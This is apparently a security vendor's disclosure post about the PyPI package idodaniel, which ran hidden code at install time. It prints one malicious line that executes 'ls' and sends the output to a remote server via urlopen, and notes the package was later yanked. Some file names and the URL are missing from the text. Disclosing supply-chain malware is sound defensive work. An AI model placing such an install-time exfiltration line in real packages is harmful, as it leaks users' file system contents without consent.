Malicious Python package leaks file system contents to a remote server

Reported Jan 04, 2022 by Ashish Bijlani

leaks file system conents to a remote server malicious

Python Package Boilerplate

13 Nov, 2018
PyPi Versions 4
Package Author

Our static analysis module flagged package idodaniel==1.0.3 as suspicious. So we decided to take a deeper look at the code, particularly the statements that were flagged by our technology as "risky". Upon further review we found that the package is indeed fishy! Here we discuss our findings.

At Ossillate, we are building a large-scale security analysis platform to vet PyPI Python packages for software supply chain attacks. Our free CLI and CI/CD tools can help developers adopt pre-vetted third-party open-source packages and ship faster.

Our technology-generated report points out a number of "risky" attributes in this package:
- last release was in Nov, 2018 (i.e., abandonware),
- homepage points to Google, and
- uses subprocess and urlopen APIs.

Fig 1 shows an excerpt from file.


Show details

    urllib.request.urlopen(''+urllib.parse.urlencode({'x': subprocess.getoutput('ls')}))

Fig 1. leaks contents of your current dir

Since contains the code that is executed immediately upon installation of a package, it is clear that the package trying to communicate with a server during the installation process. As seen from Fig 1, it first executes ls command in the background as a separate process and leak its output to a server over insecure http channel.

We reported our findings to PyPI maintainers, and they have yanked this package as of Jan, 2022.